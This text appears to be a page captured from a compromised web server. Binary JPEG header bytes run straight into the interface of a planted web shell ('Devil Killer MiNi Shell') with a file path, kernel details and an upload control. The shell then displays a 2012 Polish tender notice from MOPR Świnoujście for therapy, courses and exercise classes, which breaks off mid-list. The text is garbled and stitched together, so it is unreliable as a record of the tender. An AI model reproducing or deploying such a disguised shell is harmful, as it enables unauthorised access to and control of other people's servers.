JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120615/205096-N-2012.html

<p class="kh_header"><b>Świnoujście: Usługi szkoleniowe i terapeutyczne w ramach  projektu systemowego pn. Stać Mnie na Więcej.</b><br>
<b>Numer ogłoszenia: 205096 - 2012; data zamieszczenia: 15.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Świnoujściu , ul. J. Dąbrowskiego 4, 72-600 Świnoujście, woj. zachodniopomorskie, tel. 0-91 3225460, faks 0-91 3225461.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe i terapeutyczne w ramach  projektu systemowego pn. Stać Mnie na Więcej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia są usługi szkoleniowe i terapeutyczne, które zostaną przeprowadzone dla uczestników projektu systemowego pn. Stać Mnie na Więcej wskazanych przez Zamawiającego. 
Przedmiot zamówienia został podzielony na osiem (8) różnorodnych części:
Część I -  Terapia indywidualna, rodzinna i grupowa dla 16 osób i ich rodzin - zajęcia indywidualne i grupowe,
Część II - Doradztwo zawodowe - grupowe i indywidualne,
Część III - Kurs profesjonalnego handlowca z obsługą kasy fiskalnej, terminala płatniczego wraz z praktyczną znajomością języka niemieckiego,
Część IV -  Kurs opiekuna osób starszych z praktyczną znajomością języka niemieckiego,
Część V -  Kurs małej gastronomii z praktyczną znajomością języka niemieckiego,
Część VI - Usługa szkoleniowa,
Część VII - Zorganizowanie 14 - dniowego wyjazdu szkoleniowo-integracyjnego wraz z kursem rękodzieła użytkowego,
Część VIII -  Zajęcia ruchowe rekreacyjno-usprawniające.
Szczegółowy opis przedmiotu zamówienia w odniesieniu do poszczególnych części stanowi Załącznik nr 1 (1a do 1 h) do niniejszej SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.57.00.00-0, 85.14.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający spełnienie warunku oceni na podstawie Oświadczenia o spełnianiu warunków w trybie art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający spełnienie warunku oceni na podstawie Oświadczenia o spełnianiu warunków w trybie art. 22 ust. 1 ustawy Pzp oraz na podstawie złożonego wykazu usług w zakresie odpowiadającym części zamówienia na którą Wykonawca składa ofertę, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje) - w przypadku składania ofert na kilka części zamówienia wykonawca musi spełnić powyższy warunek dla każdej z części zamówienia odrębnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający spełnienie warunku oceni na podstawie Oświadczenia o spełnianiu warunków w trybie art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający spełnienie warunku oceni na podstawie Oświadczenia o spełnianiu warunków w trybie art. 22 ust. 1 ustawy Pzp oraz na podstawie złożonego wykazu osób i podmiotów, które będą uczestniczyć wykonywaniu Zamówienia wraz z informacjami na temat ich kwalifikacji i umiejętności niezbędnych do wykonania Zamówienia, a także zakresu wykonywanych przez nich czynności - w przypadku składania ofert na kilka części zamówienia wykonawca musi spełnić powyższy warunek dla każdej z części zamówienia odrębnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający spełnienie warunku oceni na podstawie Oświadczenia o spełnianiu warunków w trybie art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, na podstawie art. 144 ust. 1 Ustawy -  zastrzega sobie prawo do zmiany treści istotnych postanowień umowy, w następujących szczególnych okolicznościach polegających na: 
1. Zmianie terminu rozpoczęcia lub zakończenia szkolenia wywołanej 
w szczególności nie skompletowaniem na czas pełnej grupy szkoleniowej lub przyczynami niezależnymi od Wykonawcy i Zamawiającego. 
2. Zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Zmiana ta nie może doprowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ. Zmiana ta wymaga zgody Zamawiającego.  
Wszelkie zmiany do niniejszej umowy wymagają zgody Zamawiającego oraz pod rygorem nieważności zachowania formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.swinoujscie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPR Świnoujście, ul. Dąbrowskiego 4, pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2012 godzina 14:00, miejsce: MOPR Świnoujście, ul. Dąbrowskiego 4, sekretariat pok. 314.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt, w ramach którego przeprowadzone będą usługi szkoleniowe i terapeutyczne współfinansowany jest ze środków Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Terapia indywidualna, rodzinna i grupowa dla 16 osób i ich rodzin - zajęcia indywidualne i grupowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca w ramach usługi prowadzić będzie grupowe i  indywidualne spotkania 
z zakresu terapii indywidualnej i rodzinnej z uczestnikami projektu, w liczbie do 16 osób, wskazanymi przez Zamawiającego, według opracowanego przez siebie (autorskiego) indywidualnego planu pomocy. Usługa świadczona będzie w wymiarze 170 godzin zegarowych ogółem, w tym: po 10 godzin spotkań indywidualnych na jednego uczestnika projektu oraz 10 godzin spotkań grupowych - 3 spotkania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.14.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo zawodowe - grupowe i indywidualne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia indywidualne i grupowe w ramach doradztwa zawodowego prowadzone będą dla 40 osób w 3 grupach:
16 osób zagrożonych wykluczeniem społecznym, nieaktywnych zawodowo lub bezrobotnych, 
- spotkania indywidualne 16 osób x 1 godzina zegarowa
- spotkanie grupowe 1 spotkanie x 3 godziny zegarowe
14 osób bezrobotnych, w tym długotrwale,
- spotkania indywidualne 14 osób x 1 godzina zegarowa
- spotkanie grupowe 1 spotkanie x 3 godziny zegarowe
10 osób niepełnosprawnych, nieaktywnych zawodowo
- spotkania indywidualne 10 osób x 1 godzina zegarowa x 2 spotkania
- spotkanie grupowe 1 spotkanie x 3 godziny zegarowe
Łączna liczba godzin: 59..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs profesjonalnego handlowca z obsługą kasy fiskalnej, terminala płatniczego wraz z praktyczną znajomością języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursu profesjonalnego handlowca wraz z obsługą kasy fiskalnej i terminala płatniczego wraz z praktyczną znajomością języka niemieckiego.
Zajęcia przeprowadzone zostaną dla 5 uczestników projektu i będą obejmować:
- 120 h lekcyjnych  kursu profesjonalnego handlowca wraz z obsługą kasy fiskalnej i terminala płatniczego,
- 45 h kursu języka niemieckiego o tematyce handlu i obsługi klienta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs opiekuna osób starszych z praktyczną znajomością języka niemieckiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursu opiekuna osób starszych z praktyczną znajomością języka niemieckiego dla 3 uczestników projektu, który będzie obejmować:
- 120 h lekcyjnych  kursu opiekuna osób starszych,
- 45 h kursu języka niemieckiego obejmującego w szczególności słownictwo odpowiednie do tematu szkolenia zawodowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs małej gastronomii z praktyczną znajomością języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs małej gastronomii z praktyczną znajomością języka niemieckiego przeprowadzony zostanie dla 6 uczestników projektu i będzie obejmować:
- 120 h lekcyjnych  kursu małej gastronomii,
- 45 h kursu języka niemieckiego obejmującego w szczególności słownictwo odpowiednie do tematu szkolenia zawodowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługa szkoleniowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa szkoleniowa obejmująca następujące moduły:
1) Spotkania indywidualne i grupowe z psychologiem,
2) trening kompetencji i umiejętności społecznych,
3) warsztaty z komunikacji,
4) warsztaty z autoprezentacji,
5) spotkanie o tematyce zdrowego i higienicznego stylu życia,
6) przeprowadzenie badań sanitarno-epidemiologicznych do tzw. książeczki zdrowia,
7) organizacja spotkania kończącego cykl szkoleń, warsztatów i kursów.
Szczegółowy opis każdego z modułów stanowi załącznik nr 1f do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zorganizowanie 14 - dniowego wyjazdu szkoleniowo-integracyjnego wraz z kursem rękodzieła użytkowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie 14 - dniowego wyjazdu szkoleniowo-integracyjnego wraz z kursem rękodzieła użytkowego dla 10 osób niepełnosprawnych i 3 opiekunów. Wyjazd obejmuje przeprowadzenie kursu rękodzieła użytkowego - 60 h lekcyjnych szkolenia oraz warsztaty integracyjne (trening kompetencji i umiejętności społecznych) - 22 h lekcyjne.
W ramach tej części zamówienia Wykonawca zobowiązany jest zapewnić:
transport uczestników ze Świnoujścia do miejsca odbywania wyjazdu szkoleniowo-integracyjnego i z powrotem,
- zakwaterowanie wszystkich uczestników w komfortowych pokojach jedno, dwu lub trzyosobowych z pełnym węzłem sanitarnym, wyposażonych w telewizor,  wodę mineralną (0,5 litra na osobę dziennie),
- pełne wyżywienie (śniadanie, obiad, kolacja) w stołówce położonej na terenie ośrodka, a w dniu powrotu prowiant w związku z podróżą,
- dostęp do napojów zimnych i ciepłych oraz przekąsek (ciastka, kanapki, itp.) podczas zajęć szkoleniowych,
- salę szkoleniową położoną na terenie ośrodka w którym zakwaterowani zostaną uczestnicy,
- co najmniej jedną wycieczkę poza miejsce pobytu, wieczorek zapoznawczy przy muzyce, grill lub ognisko oraz innego typu atrakcję miejscową wraz z poczęstunkiem odpowiednim do tego typu imprez, 
- dostęp do bezpłatnej bazy wypoczynkowo - rekreacyjnej wraz z bezpłatną wypożyczalnią sprzętu sportowego, 
- zorganizowanie czasu wolnego dla uczestników projektu,
- opłacenie taksy klimatycznej za wszystkich uczestników jeśli będzie występowała,
- ubezpieczenie NNW dla każdego uczestnika turnusu i opiekuna obejmujące dojazd uczestników projektu i opiekunów z miejsca zamieszkania do miejsca odbywania się wyjazdu szkoleniowo-integracyjnego oraz dojazd z miejsca odbywania się wyjazdu do miejsca zamieszkania uczestników projektu, całodobowy 14 dniowy pobyt na wyjeździe szkoleniowym, na kwotę nie niższą niż 10 000 zł na jedną osobę,
- opiekuna grupy, który odpowiedzialny będzie za prawidłową realizację wyjazdu, będzie do dyspozycji uczestników, przygotuje dokumentację opisową i w postaci zdjęć oraz przeprowadzi ankiety ewaluacyjne na koniec wyjazdu,  
- zakwaterowanie w pokoju dwuosobowym - 2 noclegi i całodzienne wyżywienie (śniadanie, obiad, kolacja) dla 2 osób - delegacji z MOPR w Świnoujściu - podczas trwania wyjazdu szkoleniowo-integracyjnego - dokładny termin zostanie uzgodniony z Wykonawcą,
W ramach prowadzonych kursów podczas wyjazdu szkoleniowo-integracyjnego wykonawca zapewni:
- materiały szkoleniowe,
- obsługę techniczną szkolenia,
- wykwalifikowaną kadrę,
- wydanie zaświadczeń/certyfikatów o ukończeniu kursu, w tym zaświadczeń zgodnych z rozporządzeniem MEN z dnia 3.02.2006 r. (Dz. U. Nr 31 poz. 216).
Po zakończeniu wyjazdu szkoleniowego, wykonawca zobowiązany jest przedłożyć sprawozdanie opisowe z wyjazdu szkoleniowo-integracyjnego. Sprawozdanie powinno zawierać szczegółowe  informację o przeprowadzonych kursach - terminy, temat szkolenia, itd., organizacji czasu wolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia ruchowe rekreacyjno-usprawniające.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia ruchowe rekreacyjno-usprawniające przeprowadzone zostaną dla 10 osób niepełnosprawnych. Obejmują zorganizowanie 16 spotkań po 1 godzinę zegarową zajęć ruchowych - dwie różne formy, np. : 
- zajęcia na basenie - aerobic + pływanie,
- ćwiczenia aerobowe usprawniające motorykę, koordynację ruchową,
- ćwiczenia z elementami tańca,
- ćwiczenia z wykorzystaniem sprzętu np. step, rowerki stacjonarne.
